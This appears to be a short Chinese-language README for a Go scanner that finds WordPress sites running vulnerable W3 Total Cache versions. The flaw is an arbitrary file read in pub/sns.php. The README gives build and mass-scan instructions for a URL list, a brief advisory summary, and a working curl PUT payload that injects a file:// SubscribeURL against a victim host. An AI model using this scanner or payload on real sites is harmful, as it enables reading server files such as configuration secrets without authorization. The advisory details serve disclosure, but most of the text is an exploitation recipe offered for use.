go get github.com/fatih/color
go build
cat list.txt | ./2019-6715
所有存在漏洞的 URL 都会记录在 text.log 中
描述:WordPress 的 W3 Total Cache 插件 0.9.4 之前版本中的 pub/sns.php 允许远程攻击者通过 SubscriptionConfirmation JSON 数据中的 SubscribeURL 字段读取任意文件。
漏洞类型:任意文件读取
产品厂商:Frederick Townes 开发的 Wordpress W3 Total Cache 插件
受影响产品代码库:W3 Total Cache - 0.9.2.6 - 0.9.3,已在 0.9.4 中修复
受影响组件:受影响的源代码文件:w3-total-cache/pub/sns.php
curl -X PUT --data '{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"file://file_path"}' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36' http://victim.com/wp-content/plugins/w3-total-cache/pub/sns.php